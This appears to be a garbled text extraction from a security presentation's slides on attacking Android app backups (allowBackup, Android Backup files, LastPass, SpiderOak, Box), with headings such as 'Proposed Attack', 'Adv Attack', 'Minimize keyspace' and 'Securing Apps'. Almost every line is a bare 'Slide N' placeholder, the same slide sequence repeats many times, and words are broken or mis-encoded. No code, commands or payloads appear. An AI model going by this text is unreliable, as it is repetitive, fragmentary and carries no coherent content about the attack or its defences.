Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

